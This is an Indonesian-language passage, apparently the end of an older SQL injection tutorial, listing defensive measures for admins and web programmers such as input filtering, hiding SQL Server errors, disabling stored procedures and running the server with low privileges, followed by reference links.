KHUSUS BUAT ADMIN & WEB PROGRAMMER !!!
******************************************************
Cara pencegahan yang umum digunakan :
1. Batasi panjang input box (jika memungkinkan), dengan
cara membatasinya di kode program, jadi si cracker pemula
akan bingung sejenak melihat input box nya gak bisa di
inject dengan perintah yang panjang.
2. Filter input yang dimasukkan oleh user, terutama penggunaan
tanda kutip tunggal (Input Validation).
3. Matikan atau sembunyikan pesan-pesan error yang keluar
dari SQL Server yang berjalan.
4. Matikan fasilitas-fasilitas standar seperti Stored Procedures,
Extended Stored Procedures jika memungkinkan.
5. Ubah "Startup and run SQL Server" menggunakan low privilege user
di SQL Server Security tab.

Yah itulah mungkin yang dapat saya ceritakan.....
Hal itu adalah gambaran, betapa tidak amannya dunia internet...
Kalau mau lebih aman, copot kabel jaringan anda, copot disk
drive anda, copot harddisk anda, jual kompie anda !!!
Just kidding )

Referensi :
[+] sqlinjection, www.BlackAngels.it
[+] anvanced sql injection in sql server applications
(www.ngssoftware.com)
[+] sql injection walktrough (www.securiteam.com)

----------------------

Support Palestine